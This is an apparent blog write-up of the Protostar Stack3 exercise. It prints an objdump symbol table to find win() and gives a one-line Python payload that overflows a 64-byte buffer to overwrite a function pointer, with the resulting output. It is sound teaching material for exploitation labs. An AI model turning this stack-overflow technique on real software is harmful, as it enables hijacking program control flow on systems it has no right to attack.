Saturday, December 13, 2014

Protostar - Stack #3


Stack3 looks at environment variables, and how they can be set, and overwriting function pointers stored on the stack (as a prelude to overwriting the saved EIP) (link)

Source Code:


Stack3 seems somewhat similar to the previous 3, but we're starting to move towards the classic buffer overflow case of overwriting the saved EIP.

Here we need to overwrite the function pointer fp in such a way that it causes win() to get executed when fp is eventually called at line 20.

First, we need to find where in memory win() is located...

Running objdump -t stack3 prints:

080484f0 l     F .text    00000000              __do_global_ctors_aux
00000000 l    df *ABS*    00000000              stack3.c
0804967c l     O .got.plt    00000000              .hidden _GLOBAL_OFFSET_TABLE_
08049594 l       .ctors    00000000              .hidden __init_array_end
08049594 l       .ctors    00000000              .hidden __init_array_start
080495a8 l     O .dynamic    00000000              .hidden _DYNAMIC
0804969c  w      .data    00000000              data_start
08048480 g     F .text    00000005              __libc_csu_fini
08048370 g     F .text    00000000              _start
00000000  w      *UND*    00000000              __gmon_start__
00000000  w      *UND*    00000000              _Jv_RegisterClasses
08048538 g     O .rodata    00000004              _fp_hw
0804851c g     F .fini    00000000              _fini
00000000       F *UND*    00000000              gets@@GLIBC_2.0
00000000       F *UND*    00000000              __libc_start_main@@GLIBC_2.0
08048424 g     F .text    00000014              win
0804853c g     O .rodata    00000004              _IO_stdin_used
0804969c g       .data    00000000              __data_start
080496a0 g     O .data    00000000              .hidden __dso_handle
080495a0 g     O .dtors    00000000              .hidden __DTOR_END__
08048490 g     F .text    0000005a              __libc_csu_init
00000000       F *UND*    00000000              printf@@GLIBC_2.0
080496a4 g       *ABS*    00000000              __bss_start
080496ac g       *ABS*    00000000              _end
00000000       F *UND*    00000000              puts@@GLIBC_2.0
080496a4 g       *ABS*    00000000              _edata
080484ea g     F .text    00000000              .hidden __i686.get_pc_thunk.bx
08048438 g     F .text    00000041              main
080482e0 g     F .init    00000000              _init


The one we care about is win, which seems to be at the address 0x08048424.

Now that we know what address, the rest of the solution becomes similar to the previous levels.

Running $ python -c "print 'x'*64 + '\x24\x84\x04\x08'" | ./stack3 results in the following being printed:

calling function pointer, jumping to 0x08048424
code flow successfully changed

No comments:

Post a Comment